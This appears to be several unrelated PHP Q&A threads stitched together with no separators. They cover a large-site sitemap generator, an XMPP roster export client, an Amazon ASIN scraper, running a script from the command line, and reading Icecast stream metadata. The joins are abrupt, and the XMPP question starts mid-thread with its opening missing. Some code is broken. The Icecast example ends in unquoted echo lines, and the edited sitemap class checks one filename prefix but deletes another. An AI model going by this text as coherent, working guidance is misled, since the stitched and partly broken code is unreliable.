I want to create a sitemap for a site with more than 30,000,000 pages. The site is updated daily, with pages being removed and added.
I found this PHP script, which I would like to run as a cron job:
Sitemap php script
I have all URIs in the table "myuri", in the column "uri". Entries look like "/this-is-a-page.html". What parameters do I need to add to the script to get it running on my table?
<?php
/*
* author: Kyle Gadd
* documentation: http://www.php-ease.com/classes/sitemap.html
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
class Sitemap {
private $compress;
private $page = 'index';
private $index = 1;
private $count = 1;
private $urls = array();
public function __construct ($compress=true) {
ini_set('memory_limit', '75M'); // 50M required per tests
$this->compress = ($compress) ? '.gz' : '';
}
public function page ($name) {
$this->save();
$this->page = $name;
$this->index = 1;
}
public function url ($url, $lastmod='', $changefreq='', $priority='') {
$url = htmlspecialchars(BASE_URL . $url);
$lastmod = (!empty($lastmod)) ? date('Y-m-d', strtotime($lastmod)) : false;
$changefreq = (!empty($changefreq) && in_array(strtolower($changefreq), array('always', 'hourly', 'daily', 'weekly', 'monthly', 'yearly', 'never'))) ? strtolower($changefreq) : false;
$priority = (!empty($priority) && is_numeric($priority) && abs($priority) <= 1) ? round(abs($priority), 1) : false;
if (!$lastmod && !$changefreq && !$priority) {
$this->urls[] = $url;
} else {
$url = array('loc'=>$url);
if ($lastmod !== false) $url['lastmod'] = $lastmod;
if ($changefreq !== false) $url['changefreq'] = $changefreq;
if ($priority !== false) $url['priority'] = ($priority < 1) ? $priority : '1.0';
$this->urls[] = $url;
}
if ($this->count == 50000) {
$this->save();
} else {
$this->count++;
}
}
public function close() {
$this->save();
$this->ping_search_engines();
}
private function save () {
if (empty($this->urls)) return;
$file = "sitemap-{$this->page}-{$this->index}.xml{$this->compress}";
$xml = '<?xml version="1.0" encoding="UTF-8"?>' . "\n";
$xml .= '<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">' . "\n";
foreach ($this->urls as $url) {
$xml .= ' <url>' . "\n";
if (is_array($url)) {
foreach ($url as $key => $value) $xml .= " <{$key}>{$value}</{$key}>\n";
} else {
$xml .= " <loc>{$url}</loc>\n";
}
$xml .= ' </url>' . "\n";
}
$xml .= '</urlset>' . "\n";
$this->urls = array();
if (!empty($this->compress)) $xml = gzencode($xml, 9);
$fp = fopen(BASE_URI . $file, 'wb');
fwrite($fp, $xml);
fclose($fp);
$this->index++;
$this->count = 1;
$num = $this->index; // should have already been incremented
while (file_exists(BASE_URI . "sitemap-{$this->page}-{$num}.xml{$this->compress}")) {
unlink(BASE_URI . "sitemap-{$this->page}-{$num}.xml{$this->compress}");
$num++;
}
$this->index($file);
}
private function index ($file) {
$sitemaps = array();
$index = "sitemap-index.xml{$this->compress}";
if (file_exists(BASE_URI . $index)) {
$xml = (!empty($this->compress)) ? gzfile(BASE_URI . $index) : file(BASE_URI . $index);
$tags = $this->xml_tag(implode('', $xml), array('sitemap'));
foreach ($tags as $xml) {
$loc = str_replace(BASE_URL, '', $this->xml_tag($xml, 'loc'));
$lastmod = $this->xml_tag($xml, 'lastmod');
$lastmod = ($lastmod) ? date('Y-m-d', strtotime($lastmod)) : date('Y-m-d');
if (file_exists(BASE_URI . $loc)) $sitemaps[$loc] = $lastmod;
}
}
$sitemaps[$file] = date('Y-m-d');
$xml = '<?xml version="1.0" encoding="UTF-8"?>' . "\n";
$xml .= '<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">' . "\n";
foreach ($sitemaps as $loc => $lastmod) {
$xml .= ' <sitemap>' . "\n";
$xml .= ' <loc>' . BASE_URL . $loc . '</loc>' . "\n";
$xml .= ' <lastmod>' . $lastmod . '</lastmod>' . "\n";
$xml .= ' </sitemap>' . "\n";
}
$xml .= '</sitemapindex>' . "\n";
if (!empty($this->compress)) $xml = gzencode($xml, 9);
$fp = fopen(BASE_URI . $index, 'wb');
fwrite($fp, $xml);
fclose($fp);
}
private function xml_tag ($xml, $tag, &$end='') {
if (is_array($tag)) {
$tags = array();
while ($value = $this->xml_tag($xml, $tag[0], $end)) {
$tags[] = $value;
$xml = substr($xml, $end);
}
return $tags;
}
$pos = strpos($xml, "<{$tag}>");
if ($pos === false) return false;
$start = strpos($xml, '>', $pos) + 1;
$length = strpos($xml, "</{$tag}>", $start) - $start;
$end = strpos($xml, '>', $start + $length) + 1;
return ($end !== false) ? substr($xml, $start, $length) : false;
}
public function ping_search_engines () {
$sitemap = BASE_URL . 'sitemap-index.xml' . $this->compress;
$engines = array();
$engines['www.google.com'] = '/webmasters/tools/ping?sitemap=' . urlencode($sitemap);
$engines['www.bing.com'] = '/webmaster/ping.aspx?siteMap=' . urlencode($sitemap);
$engines['submissions.ask.com'] = '/ping?sitemap=' . urlencode($sitemap);
foreach ($engines as $host => $path) {
if ($fp = fsockopen($host, 80)) {
$send = "HEAD $path HTTP/1.1\r\n";
$send .= "HOST: $host\r\n";
$send .= "CONNECTION: Close\r\n\r\n";
fwrite($fp, $send);
$http_response = fgets($fp, 128);
fclose($fp);
list($response, $code) = explode (' ', $http_response);
if ($code != 200) trigger_error ("{$host} ping was unsuccessful.<br />Code: {$code}<br />Response: {$response}");
}
}
}
public function __destruct () {
$this->save();
}
}
?>
There is already an example of usage on the page:
<?php
require_once ('php/classes/Sitemap.php');
$sitemap = new Sitemap;
if (get('pages')) {
$sitemap->page('pages');
$result = db_query ("SELECT url, created FROM pages"); // 20 pages
while (list($url, $created) = $result->fetch_row()) {
$sitemap->url($url, $created, 'yearly');
}
}
if (get('posts')) {
$sitemap->page('posts');
$result = db_query ("SELECT url, updated FROM posts"); // 70,000 posts
while (list($url, $updated) = $result->fetch_row()) {
$sitemap->url($url, $updated, 'monthly');
}
}
$sitemap->close();
unset ($sitemap);
function get ($name) {
return (isset($_GET['update']) && strpos($_GET['update'], $name) !== false) ? true : false;
}
?>
I would change this part....
if (get('pages')) {
$sitemap->page('pages');
$result = db_query ("SELECT uri FROM myuri");
while (list($url) = $result->fetch_row()) {
$sitemap->url($url,'', 'yearly');
}
}
Not sure if that $updated is needed? It looks like the function just defaults it to an empty string anyway. But you could add a timestamp column to your table to pull the last-updated date as well, and pass it to the function where I put ''.
Also, remove this part:
if (get('posts')) {
$sitemap->page('posts');
$result = db_query ("SELECT url, updated FROM posts"); // 70,000 posts
while (list($url, $updated) = $result->fetch_row()) {
$sitemap->url($url, $updated, 'monthly');
}
}
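For a table as large as the one in the question, it may help to stream rows rather than load them all at once. The following is only a sketch: the `updated_at` column and the helper name `addRowsToSitemap()` are assumptions, not part of the original script or table. The helper accepts any iterable of rows, so an unbuffered mysqli result could be passed in directly.

```php
<?php
// Hypothetical helper (not part of the Sitemap class): feeds rows to a callback
// that has the same signature as Sitemap::url($url, $lastmod, $changefreq).
function addRowsToSitemap(iterable $rows, callable $addUrl, string $changefreq = 'daily'): int
{
    $count = 0;
    foreach ($rows as $row) {
        // "updated_at" is an assumed column; fall back to '' when it is absent.
        $lastmod = isset($row['updated_at']) ? $row['updated_at'] : '';
        $addUrl($row['uri'], $lastmod, $changefreq);
        $count++;
    }
    return $count;
}

// Possible usage with mysqli, streaming rows instead of buffering them:
//   $result = $mysqli->query('SELECT uri FROM myuri', MYSQLI_USE_RESULT);
//   $sitemap->page('pages');
//   addRowsToSitemap($result, [$sitemap, 'url']);
//   $sitemap->close();
```

Keeping the row source separate from the sitemap writer also makes it easy to try the loop on a small array before running it against the full table.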
I can't use Composer (the server is behind a firewall, and PHP-download.com does not work).
In particular, I need to export the user list with their groups.
I have tried https://code.google.com/archive/p/xmpphp/ but it is not compatible with PHP 7.
So you can't use Composer on the server. OK, but why not run Composer on your own machine, load the dependencies there, and upload the vendor folder? Then you have everything you need.
Composer downloads all dependencies into the vendor folder and generates some autoloading files. When you upload the whole project, it should work.
$server = "SERVER NAME HERE";
$username = "USER NAME HERE";
$password = "PASSWORD HERE";
$resource = "globe";
$streamid = "";
function vardump($data, $title = false){
if($title){
echo '<H2>' . $title . '</H2>';
}
echo '<PRE>';
var_dump($data);
echo '</PRE>';
}
function open_connection($server) {
$connection = fsockopen($server, 5222, $errno, $errstr);
if (!$connection) {
print "$errstr ($errno)<br>";
return false;
}
return $connection;
}
function send_xml($connection, $xml) {
fwrite($connection, $xml);
}
function textcontains($text, $searchfor, $or = false){
return stripos($text, $searchfor) !== false;
}
function send_recv_xml($connection, $xml, $size = 4096) {
send_xml($connection, $xml);
$data = recv_xml($connection, $size);
$data["sent_xml"] = $xml;
$data["sent_html"] = htmlspecialchars($xml);
return $data;
}
function fread_untildone($connection, $size = 4096){
$content = '';
if($size < 0){
while(!textcontains($content, '</iq>')){
$content .= fread($connection, abs($size));
}
} else {
$content = fread($connection, $size);
}
/*while(!feof($connection)){//did not work
$content .= fread($connection, $size);
}*/
return $content;
}
function recv_xml($connection, $size = 4096) {
$xml = fread_untildone($connection, $size);
if ($xml === "") {
return null;
}
// parses xml
$xml_parser = xml_parser_create();
xml_parse_into_struct($xml_parser, $xml, $val, $index);
xml_parser_free($xml_parser);
$RET = array($val, $index);
$RET["originaldata"] = $xml;
$RET["specialdata"] = htmlspecialchars($xml);
$RET["time"] = time();
return $RET;
}
function find_xmpp($connection, $tag, $value=null, &$ret=null) {
static $val = null, $index = null;
do {
if ($val === null && $index === null) {
list($val, $index) = recv_xml($connection);
if ($val === null || $index === null) {
return false;
}
}
foreach ($index as $tag_key => $tag_array) {
if ($tag_key === $tag) {
if ($value === null) {
if (isset($val[$tag_array[0]]['value'])) {
$ret = $val[$tag_array[0]]['value'];
}
return true;
}
foreach ($tag_array as $i => $pos) {
if ($val[$pos]['tag'] === $tag && isset($val[$pos]['value']) &&
$val[$pos]['value'] === $value) {
$ret = $val[$pos]['value'];
return true;
}
}
}
}
$val = $index = null;
} while (!feof($connection));
return false;
}
function xmpp_connect($server, $username, $password, $resource = "globe") {
global $streamid;
$connection = open_connection($server);
if (!$connection) {
return false;
}
send_xml($connection, '<stream:stream xmlns:stream="http://etherx.jabber.org/streams" version="1.0" xmlns="jabber:client" to="' . $server . '" xml:lang="en" xmlns:xml="http://www.w3.org/XML/1998/namespace">');
$data = recv_xml($connection);
$streamid = $data[0][0]["attributes"]["ID"];
//vardump($streamid, "stream id:");
send_xml($connection, '<iq type="get" to="' . $server . '" id="auth1"><query xmlns="jabber:iq:auth"><username>' . $username . '</username></query></iq>');
$data = recv_xml($connection);
$XML = '<iq type="set" id="auth2"><query xmlns="jabber:iq:auth">';
$fields = [];
foreach($data[1] as $KEY => $VALUE){
$KEY = strtolower($KEY);
switch($KEY){
case "username": $VALUE = $username; break;
case "password": $VALUE = $password; break;
case "digest": $VALUE = strtolower(sha1($streamid . $password)); break;
case "resource": $VALUE = $resource; break;
default: $VALUE = "";
}
$fields[ $KEY ] = $VALUE;
if($VALUE){
$XML .= '<' . $KEY . '>' . $VALUE . '</' . $KEY . '>';
}
}
$XML .= '</query></iq>';
//vardump($fields, "auth");
$data = send_recv_xml($connection, $XML);
//vardump($data, 'login');
return $connection;
}
function xmpp_enum_users($connection, $server, $username, $resource = "globe"){
//$XML = '<iq from="' . $username . '@' . $server . '/' . $resource . '" id="get-registered-users-list-1" to="' . $server . '" type="set" xml:lang="en">';
//$XML .= '<command xmlns="http://jabber.org/protocol/commands" action="execute" node="http://jabber.org/protocol/admin#get-registered-users-list"/></iq>';
/*$XML = '<iq from="' . $username . '" type="result" to="' . $username . '@' . $server . '/' . $resource . '" id="123">
<query xmlns="http://jabber.org/protocol/disco#items">
<item jid="conference.localhost" />
<item jid="pubsub.localhost" />
<item jid="riot.localhost" />
<item jid="vjud.localhost" />
<item node="announce" name="Announcements" jid="localhost" />
<item node="config" name="Configuration" jid="localhost" />
<item node="user" name="User Management" jid="localhost" />
<item node="online users" name="Online Users" jid="localhost" />
<item node="all users" name="All Users" jid="localhost" />
<item node="outgoing s2s" name="Outgoing s2s Connections" jid="localhost" />
<item node="running nodes" name="Running Nodes" jid="localhost" />
<item node="stopped nodes" name="Stopped Nodes" jid="localhost" />
</query></iq>';*/
global $streamid;
$XML = '<iq from="' . $username . '@' . $server . '/' . $resource . '" id="' . $streamid . '" type="get"><query xmlns="jabber:iq:roster"/></iq>';
return send_recv_xml($connection, $XML, -4096);
}
function xmpp_disconnect($connection){
fclose($connection);
}
$connection = xmpp_connect($server, $username, $password, $resource);
$data = xmpp_enum_users($connection, $server, $username, $resource);
$xml = simplexml_load_string($data["originaldata"]);
$users = [];
foreach($xml->query->item as $user){
// Cast to string: SimpleXMLElement objects cannot be used as array keys.
$username = (string) $user->attributes()->name;
$group = (string) $user->group[0];
$users[$username] = $group;
}
vardump($users, "users");
echo '<HR>' . json_encode($users);
echo '<HR>';
foreach($users as $username => $group){
echo $username . '=' . $group . '<BR>';
}
xmpp_disconnect($connection);
This is the start of an XMPP client. It took a while to find the base code to connect, and I noticed other people asking for this but not getting it.
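Since the goal is to export users together with their groups, the roster reply can also be parsed so that every group of a contact is kept, not only the first. This is a minimal sketch, assuming the reply is a complete `<iq>` element; the function name `parseRoster()` and the sample JIDs are made up for illustration.

```php
<?php
// Hypothetical helper: maps each roster JID to the list of its group names.
function parseRoster(string $iqXml): array
{
    if ($iqXml === '') {
        return [];
    }
    $doc = new DOMDocument();
    // Suppress parser warnings; malformed input simply yields an empty list.
    if (!@$doc->loadXML($iqXml)) {
        return [];
    }
    $users = [];
    foreach ($doc->getElementsByTagName('item') as $item) {
        $groups = [];
        foreach ($item->getElementsByTagName('group') as $group) {
            $groups[] = trim($group->textContent);
        }
        $users[$item->getAttribute('jid')] = $groups;
    }
    return $users;
}

// Made-up sample reply, shaped like a jabber:iq:roster result.
$sample = '<iq type="result" id="r1"><query xmlns="jabber:iq:roster">'
        . '<item jid="alice@example.org" name="Alice"><group>Staff</group></item>'
        . '<item jid="bob@example.org" name="Bob"/></query></iq>';
echo json_encode(parseRoster($sample)), "\n";
```

Keying by JID rather than display name avoids collisions when two contacts share a name.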
I'm trying to scrape Amazon ASIN codes using the code below:
<?php
class Scraper {
const BASE_URL = "http://www.amazon.com";
private $categoryFile = "";
private $outputFile = "";
private $catArray;
private $currentPage = NULL;
private $asin = array();
private $categoriesMatched = 0;
private $categoryProducts = array();
private $pagesMatched = 0;
private $totalPagesMatched = 0;
private $productsMatched = 0;
public function __construct($categoryFile, $outputFile) {
$this->categoryFile = $categoryFile;
$this->outputFile = $outputFile;
}
public function run() {
$this->readCategories($this->categoryFile);
$this->setupASINArray($this->asin);
$x = 1;
foreach ($this->catArray as $cat) {
$this->categoryProducts["$x"] = 0;
if ($this->currentPage == NULL) {
$this->currentPage = $cat;
$this->scrapeASIN($this->currentPage, $x);
$this->pagesMatched++;
}
if ($this->getNextPageLink($this->currentPage)) {
do {
// next page found
$this->pagesMatched++;
$this->scrapeASIN($this->currentPage, $x);
} while ($this->getNextPageLink($this->currentPage));
}
echo "Category complete: $this->pagesMatched Pages" . "\n";
$this->totalPagesMatched += $this->pagesMatched;
$this->pagesMatched = 0;
$this->writeASIN($this->outputFile, $x);
$x++;
$this->currentPage = NULL;
$this->categoriesMatched++;
}
$this->returnStats();
}
private function readCategories($categoryFile) {
$catArray = file($categoryFile, FILE_IGNORE_NEW_LINES);
$this->catArray = $catArray;
}
private function setupASINArray($asinArray) {
$x = 0;
foreach ($this->catArray as $cat) {
$asinArray["$x"][0] = "$cat";
$x++;
}
$this->asin = $asinArray;
}
private function getNextPageLink($currentPage) {
$document = new DOMDocument();
$html = file_get_contents($currentPage);
@$document->loadHTML($html);
$xpath = new DOMXPath($document);
$element = $xpath->query("//a[@id='pagnNextLink']/@href");
if ($element->length != 0) {
$this->currentPage = self::BASE_URL . $element->item(0)->value;
return true;
} else {
return false;
}
}
private function scrapeASIN($currentPage, $catNo) {
$html = file_get_contents($currentPage);
$regex = '~(?:www\.)?ama?zo?n\.(?:com|ca|co\.uk|co\.jp|de|fr)/(?:exec/obidos/ASIN/|o/|gp/product/|(?:(?:[^"\'/]*)/)?dp/|)(B[A-Z0-9]{9})(?:(?:/|\?|\#)(?:[^"\'\s]*))?~isx';
preg_match_all($regex, $html, $asin);
foreach ($asin[1] as $match) {
$this->asin[$catNo-1][] = $match;
}
}
private function writeASIN($outputFile, $catNo) {
$fh = fopen($outputFile, "a+");
$this->fixDupes($catNo);
$this->productsMatched += (count($this->asin[$catNo-1]) - 1);
$this->categoryProducts["$catNo"] = (count($this->asin[$catNo-1]) - 1);
flock($fh, LOCK_EX);
$x = 0;
foreach ($this->asin[$catNo-1] as $asin) {
fwrite($fh, "$asin" . "\n");
$x++;
}
flock($fh, LOCK_UN);
fclose($fh);
$x -= 1;
echo "$x ASIN codes written to file" . "\n";
}
private function fixDupes($catNo) {
$this->asin[$catNo-1] = array_unique($this->asin[$catNo-1], SORT_STRING);
}
public function returnStats() {
echo "Categories matched: " . $this->categoriesMatched . "\n";
echo "Pages parsed: " . $this->totalPagesMatched . "\n";
echo "Products parsed: " . $this->productsMatched . "\n";
echo "Category breakdown:" . "\n";
$x = 1;
foreach ($this->categoryProducts as $catProds) {
echo "Category $x had $catProds products" . "\n";
$x++;
}
}
}
$scraper = new Scraper($argv[1], $argv[2]);
$scraper->run();
?>
It works fine on XAMPP on Windows, but not on Linux. Any ideas as to why this may be? On Linux it sometimes writes 0 ASINs to the file, and sometimes it scrapes only 1 page in a category of 400+ pages. The output and functionality are totally fine on Windows/XAMPP.
Any thoughts would be greatly appreciated!
Cheers
- Bryce
Try changing it this way, just to avoid the error messages:
private function readCategories($categoryFile) {
if (file_exists($categoryFile)) {
$catArray = file($categoryFile, FILE_IGNORE_NEW_LINES);
$this->catArray = $catArray;
} else {
echo "File ".$categoryFile.' does not exist!';
$this->catArray = array();
}
}
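Going one step further than the existence check, the category list could also be cleaned while it is read, so that stray whitespace or blank lines in the file do not end up in the URLs. This is only a sketch of that idea; `readCategoryUrls()` is a hypothetical standalone variant of readCategories(), and whether such characters are the actual cause of the Linux problem is not confirmed by the question.

```php
<?php
// Hypothetical standalone variant of readCategories(): returns trimmed,
// non-empty lines, or an empty array when the file cannot be read.
function readCategoryUrls(string $categoryFile): array
{
    if (!is_readable($categoryFile)) {
        return [];
    }
    $lines = file($categoryFile, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
    if ($lines === false) {
        return [];
    }
    // trim() also removes a trailing "\r" left over from Windows line endings.
    $lines = array_map('trim', $lines);
    $lines = array_filter($lines, function ($line) {
        return $line !== '';
    });
    return array_values($lines);
}
```

The caller can then report an empty result itself instead of the function echoing a message.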
I use a script from here to generate my sitemaps.
I can call it from the browser with http://www.example.com/sitemap.php?update=pages and it works fine.
I need to call it as a shell script so that I can automate it with the Windows Task Scheduler. For that, the script needs to be changed to receive the ?update=pages variable, but I haven't managed to change it correctly.
Could anybody help me so that I can execute the script from the command line with
...\php C:\path\to\script\sitemap.php update=pages? It would also be fine for me to hardcode the variables into the script, since I won't change them anyway.
define("BASE_URL", "http://www.example.com/");
define ('BASE_URI', $_SERVER['DOCUMENT_ROOT'] . '/');
class Sitemap {
private $compress;
private $page = 'index';
private $index = 1;
private $count = 1;
private $urls = array();
public function __construct ($compress=true) {
ini_set('memory_limit', '75M'); // 50M required per tests
$this->compress = ($compress) ? '.gz' : '';
}
public function page ($name) {
$this->save();
$this->page = $name;
$this->index = 1;
}
public function url ($url, $lastmod='', $changefreq='', $priority='') {
$url = htmlspecialchars(BASE_URL . 'xx' . $url);
$lastmod = (!empty($lastmod)) ? date('Y-m-d', strtotime($lastmod)) : false;
$changefreq = (!empty($changefreq) && in_array(strtolower($changefreq), array('always', 'hourly', 'daily', 'weekly', 'monthly', 'yearly', 'never'))) ? strtolower($changefreq) : false;
$priority = (!empty($priority) && is_numeric($priority) && abs($priority) <= 1) ? round(abs($priority), 1) : false;
if (!$lastmod && !$changefreq && !$priority) {
$this->urls[] = $url;
} else {
$url = array('loc'=>$url);
if ($lastmod !== false) $url['lastmod'] = $lastmod;
if ($changefreq !== false) $url['changefreq'] = $changefreq;
if ($priority !== false) $url['priority'] = ($priority < 1) ? $priority : '1.0';
$this->urls[] = $url;
}
if ($this->count == 50000) {
$this->save();
} else {
$this->count++;
}
}
public function close() {
$this->save();
}
private function save () {
if (empty($this->urls)) return;
$file = "sitemaps/xx-sitemap-{$this->page}-{$this->index}.xml{$this->compress}";
$xml = '<?xml version="1.0" encoding="UTF-8"?>' . "\n";
$xml .= '<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">' . "\n";
foreach ($this->urls as $url) {
$xml .= ' <url>' . "\n";
if (is_array($url)) {
foreach ($url as $key => $value) $xml .= " <{$key}>{$value}</{$key}>\n";
} else {
$xml .= " <loc>{$url}</loc>\n";
}
$xml .= ' </url>' . "\n";
}
$xml .= '</urlset>' . "\n";
$this->urls = array();
if (!empty($this->compress)) $xml = gzencode($xml, 9);
$fp = fopen(BASE_URI . $file, 'wb');
fwrite($fp, $xml);
fclose($fp);
$this->index++;
$this->count = 1;
$num = $this->index; // should have already been incremented
while (file_exists(BASE_URI . "xxb-sitemap-{$this->page}-{$num}.xml{$this->compress}")) {
unlink(BASE_URI . "xxc-sitemap-{$this->page}-{$num}.xml{$this->compress}");
$num++;
}
$this->index($file);
}
private function index ($file) {
$sitemaps = array();
$index = "sitemaps/xx-sitemap-index.xml{$this->compress}";
if (file_exists(BASE_URI . $index)) {
$xml = (!empty($this->compress)) ? gzfile(BASE_URI . $index) : file(BASE_URI . $index);
$tags = $this->xml_tag(implode('', $xml), array('sitemap'));
foreach ($tags as $xml) {
$loc = str_replace(BASE_URL, '', $this->xml_tag($xml, 'loc'));
$lastmod = $this->xml_tag($xml, 'lastmod');
$lastmod = ($lastmod) ? date('Y-m-d', strtotime($lastmod)) : date('Y-m-d');
if (file_exists(BASE_URI . $loc)) $sitemaps[$loc] = $lastmod;
}
}
$sitemaps[$file] = date('Y-m-d');
$xml = '<?xml version="1.0" encoding="UTF-8"?>' . "\n";
$xml .= '<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">' . "\n";
foreach ($sitemaps as $loc => $lastmod) {
$xml .= ' <sitemap>' . "\n";
$xml .= ' <loc>' . BASE_URL . $loc . '</loc>' . "\n";
$xml .= ' <lastmod>' . $lastmod . '</lastmod>' . "\n";
$xml .= ' </sitemap>' . "\n";
}
$xml .= '</sitemapindex>' . "\n";
if (!empty($this->compress)) $xml = gzencode($xml, 9);
$fp = fopen(BASE_URI . $index, 'wb');
fwrite($fp, $xml);
fclose($fp);
}
private function xml_tag ($xml, $tag, &$end='') {
if (is_array($tag)) {
$tags = array();
while ($value = $this->xml_tag($xml, $tag[0], $end)) {
$tags[] = $value;
$xml = substr($xml, $end);
}
return $tags;
}
$pos = strpos($xml, "<{$tag}>");
if ($pos === false) return false;
$start = strpos($xml, '>', $pos) + 1;
$length = strpos($xml, "</{$tag}>", $start) - $start;
$end = strpos($xml, '>', $start + $length) + 1;
return ($end !== false) ? substr($xml, $start, $length) : false;
}
public function __destruct () {
$this->save();
}
}
// start part 2
$sitemap = new Sitemap;
if (get('pages')) {
$sitemap->page('pages');
$result = mysql_query("SELECT uri FROM app_uri");
while (list($url, $created) = mysql_fetch_row($result)) {
$sitemap->url($url, $created, 'monthly');
}
}
$sitemap->close();
unset ($sitemap);
function get ($name) {
return (isset($_GET['update']) && strpos($_GET['update'], $name) !== false) ? true : false;
}
?>
You could install wget (it's available for Windows as well) and then call the URL via localhost in the Task Scheduler script:
wget.exe "http://localhost/path/to/script.php?update=pages"
This way you wouldn't have to rewrite the PHP script.
Otherwise, if the script is meant for shell usage only, pass the variables on the command line:
php yourscript.php variable1 variable2 ...
In the PHP script you can then access those variables using the $argv variable:
$variable1 = $argv[1];
$variable2 = $argv[2];
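To keep the existing get('pages') check unchanged, the command-line arguments can instead be copied into $_GET. Below is a minimal sketch, assuming arguments are passed in the name=value form used in the question (update=pages); the helper name `cliQueryArgs()` is made up for illustration.

```php
<?php
// Hypothetical helper: turns CLI arguments such as "update=pages" into an
// array shaped like $_GET. The first element (the script name) is skipped.
function cliQueryArgs(array $argv): array
{
    $params = [];
    foreach (array_slice($argv, 1) as $arg) {
        parse_str($arg, $pair);          // "update=pages" becomes ['update' => 'pages']
        $params = array_merge($params, $pair);
    }
    return $params;
}

// When run from the shell, make the arguments visible through $_GET so the
// rest of the script works the same as it does in the browser.
if (PHP_SAPI === 'cli' && isset($_SERVER['argv'])) {
    $_GET = array_merge($_GET, cliQueryArgs($_SERVER['argv']));
}
```

With this at the top of the script, `php sitemap.php update=pages` should behave like requesting `sitemap.php?update=pages`. Note that $_SERVER['DOCUMENT_ROOT'] is normally empty on the command line, so BASE_URI would need a fixed path there.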
Have a look at "How to pass GET variables to php file with Shell?", which already answers the same question. :)
I found a script which can extract the artist and title from an Icecast or Shoutcast stream.
I want the script to update automatically when the song changes; at the moment it only works when I execute it. I'm new to PHP, so any help will be appreciated.
Thanks!
define('CRLF', "\r\n");
class streaminfo{
public $valid = false;
public $useragent = 'Winamp 2.81';
protected $headers = array();
protected $metadata = array();
public function __construct($location){
$errno = $errstr = '';
$t = parse_url($location);
$sock = fsockopen($t['host'], $t['port'], $errno, $errstr, 5);
$path = isset($t['path'])?$t['path']:'/';
if ($sock){
$request = 'GET '.$path.' HTTP/1.0' . CRLF .
'Host: ' . $t['host'] . CRLF .
'Connection: Close' . CRLF .
'User-Agent: ' . $this->useragent . CRLF .
'Accept: */*' . CRLF .
'icy-metadata: 1'.CRLF.
'icy-prebuffer: 65536'.CRLF.
(isset($t['user'])?'Authorization: Basic '.base64_encode($t['user'].':'.$t['pass']).CRLF:'').
'X-TipOfTheDay: Winamp "Classic" rulez all of them.' . CRLF . CRLF;
if (fwrite($sock, $request)){
$theaders = $line = '';
while (!feof($sock)){
$line = fgets($sock, 4096);
if('' == trim($line)){
break;
}
$theaders .= $line;
}
$theaders = explode(CRLF, $theaders);
foreach ($theaders as $header){
$t = explode(':', $header);
if (isset($t[0]) && trim($t[0]) != ''){
$name = preg_replace('/[^a-z][^a-z0-9]*/i','', strtolower(trim($t[0])));
array_shift($t);
$value = trim(implode(':', $t));
if ($value != ''){
if (is_numeric($value)){
$this->headers[$name] = (int)$value;
}else{
$this->headers[$name] = $value;
}
}
}
}
if (!isset($this->headers['icymetaint'])){
$data = ''; $metainterval = 512;
while(!feof($sock)){
$data .= fgetc($sock);
if (strlen($data) >= $metainterval) break;
}
$this->print_data($data);
$matches = array();
preg_match_all('/([\x00-\xff]{2})\x0\x0([a-z]+)=/i', $data, $matches, PREG_OFFSET_CAPTURE);
preg_match_all('/([a-z]+)=([a-z0-9\(\)\[\]., ]+)/i', $data, $matches, PREG_SPLIT_NO_EMPTY);
echo '<pre>';var_dump($matches);echo '</pre>';
$title = $artist = '';
foreach ($matches[0] as $nr => $values){
$offset = $values[1];
$length = ord($values[0]{0}) +
(ord($values[0]{1}) * 256)+
(ord($values[0]{2}) * 256*256)+
(ord($values[0]{3}) * 256*256*256);
$info = substr($data, $offset + 4, $length);
$seperator = strpos($info, '=');
$this->metadata[substr($info, 0, $seperator)] = substr($info, $seperator + 1);
if (substr($info, 0, $seperator) == 'title') $title = substr($info, $seperator + 1);
if (substr($info, 0, $seperator) == 'artist') $artist = substr($info, $seperator + 1);
}
$this->metadata['streamtitle'] = $artist . ' - ' . $title;
}else{
$metainterval = $this->headers['icymetaint'];
$intervals = 0;
$metadata = '';
while(1){
$data = '';
while(!feof($sock)){
$data .= fgetc($sock);
if (strlen($data) >= $metainterval) break;
}
//$this->print_data($data);
$len = join(unpack('c', fgetc($sock))) * 16;
if ($len > 0){
$metadata = str_replace("\0", '', fread($sock, $len));
break;
}else{
$intervals++;
if ($intervals > 100) break;
}
}
$metarr = explode(';', $metadata);
foreach ($metarr as $meta){
$t = explode('=', $meta);
if (isset($t[0]) && trim($t[0]) != ''){
$name = preg_replace('/[^a-z][^a-z0-9]*/i','', strtolower(trim($t[0])));
array_shift($t);
$value = trim(implode('=', $t));
if (substr($value, 0, 1) == '"' || substr($value, 0, 1) == "'"){
$value = substr($value, 1);
}
if (substr($value, -1) == '"' || substr($value, -1) == "'"){
$value = substr($value, 0, -1);
}
if ($value != ''){
$this->metadata[$name] = $value;
}
}
}
}
fclose($sock);
$this->valid = true;
}else echo 'unable to write.';
}else echo 'no socket '.$errno.' - '.$errstr.'.';
}
public function print_data($data){
$data = str_split($data);
$c = 0;
$string = '';
echo "<pre>\n000000 ";
foreach ($data as $char){
$string .= addcslashes($char, "\n\r\0\t");
$hex = dechex(join(unpack('C', $char)));
if ($c % 4 == 0) echo ' ';
if ($c % (4*4) == 0 && $c != 0){
foreach (str_split($string) as $s){
//echo " $string\n";
if (ord($s) < 32 || ord($s) > 126){
echo '\\'.ord($s);
}else{
echo $s;
}
}
echo "\n";
$string = '';
echo str_pad($c, 6, '0', STR_PAD_LEFT).' ';
}
if (strlen($hex) < 1) $hex = '00';
if (strlen($hex) < 2) $hex = '0'.$hex;
echo $hex.' ';
$c++;
}
echo " $string\n</pre>";
}
public function __get($name){
if (isset($this->metadata[$name])){
return $this->metadata[$name];
}
if (isset($this->headers[$name])){
return $this->headers[$name];
}
return null;
}
}
$t = new streaminfo('http://64.236.34.196:80/stream/1014'); // get metadata
echo Meta Interval: $t->icymetaint;
echo Current Track: $t->streamtitle;
You will need to constantly query the stream at a set interval to find when the song changes.
This can be best done by scheduling a cron job.
If on Windows, you should use the Windows Task Scheduler
